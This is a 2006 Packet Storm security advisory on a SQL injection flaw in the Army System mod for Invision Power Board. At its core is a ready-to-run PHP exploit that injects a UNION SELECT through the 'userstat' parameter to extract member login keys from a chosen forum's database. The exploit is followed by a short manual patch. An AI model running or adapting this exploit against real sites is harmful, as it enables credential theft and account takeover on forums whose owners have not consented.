ArmySystemv2.1.txt

2006-02-13T00:00:00
ID PACKETSTORM:43756
Type packetstorm
Reporter fRoGGz
Modified 2006-02-13T00:00:00

Description

                                        
                                            `Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit  
  
VULNERABLE PRODUCT  
-----------------------------------  
Invision Power Board Army System Mod  
Version: 2.1 and priors.  
Url: http://supersmashbrothers.2ya.com  
Vulnerability: Remote SQL Injection  
-----------------------------------------------------  
  
  
BACKGROUND  
----------------------------  
Army System v2.1 is a very popular mods that has a ranking system built-in.  
This multiple player rpg can easily be installed on every Invision Power Board v2.x.x  
Source: "http://mods.invisionize.com/db/index.php/f/3347"  
Google: "Army System 2.1 by supersmashbrothers"  
  
********************************************************************  
Requirements Minimum: Invision Board: 2.0.0 Final PHP: 4.1.0  
Recommended Invision Board: 2.0.1 PHP: 4.3.0 or better SQL  
Any sql will work fine as long as you have the driver.  
Minimum MySQL: 3.23  
Recommended MySQL: 3.23 or better  
Recommended for Larger sites: No memory limit and no safe mode for faster loading  
********************************************************************  
  
  
VULNERABILITY  
-------------------------------  
Army System is prone to a SQL injection vulnerability. This issue is due to a failure   
in the application to properly sanitize user-supplied input passed to the "userstat" parameter   
is not correctly sanitised before being used in a SQL query. A specially crafted URL could   
result in a compromise of the application, disclosure or modification of data, or may permit   
an attacker to exploit vulnerabilities in the underlying database implementation.  
  
  
EXPLOIT  
----------------  
  
<?php  
/* --------------------------- EXPLOIT ---------------------------  
Invision Power Board Army System Mod 2.1 SQL Injection Exploit  
Tested on: Latest version (2.1.0)  
Discovered on: 06.02.2006 by Alex & fRoGGz  
Credits to: SecuBox Labs  
  
PLEASE READ THIS !  
The query of the SQL Injection depends about the number of fields in the sql table  
We have successfully tested the exploit on a new fresh IPB 2.1.x with Army   
System Mod 2.1 installed  
  
IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE   
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL  
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR  
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER   
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,  
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE  
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.  
*/  
  
$target = "http://site.com/forums/"; // <--- Where ?  
$prefix = "ibf_"; // <--- SQL prefix ?  
$id = 1; // <--- Who ?  
  
print_r(get_infos($target,$prefix,$id));  
if(!get_infos($target,$prefix,$id)) echo "failed";  
  
function get_infos($target,$prefix,$id) {  
  
$inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";  
$inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";  
$inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";  
$inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";  
$inject.= "NULL+FROM+".$prefix."members+WHERE+id=";  
  
$filename = $target . $inject . $id;  
  
$handle = fopen ($filename, "r");  
$infos = array();  
  
if (feof($handle)) { continue 2; }  
if ( $handle ) {  
while ( ($buffer = fgets( $handle )) )  
{  
if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") ) {  
$infos['md5'] = strip_tags ( fgets( $handle) );  
break;  
}  
}  
}  
  
fclose ($handle);  
  
if (count($infos) == 1) return $infos;  
return false;  
}  
?>  
  
  
  
VENDOR STATUS  
---------------------------  
There is no solution at the time.  
Edit the source code manually to solve this problem & many others !  
  
  
// You could temporary fix the problem:  
// Find sources/action_public/army.php (line 486:$id2 = $this->ipsclass->input['ID'];  
// After the line put:  
$id2 = ereg_replace('([^0-9])','',$id2);  
$id2 = (int)$id2;  
-----------------------------------------------------------------------------  
  
  
CREDiTS  
------------------------------  
SecuBox Labs - fRoGGz & Alex  
Greet's fly out to: Mark aka MT  
Visit: http://secubox.shadock.net  
--------------------------------------------  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
--   
___________________________________________________  
Play 100s of games for FREE! http://games.mail.com/  
`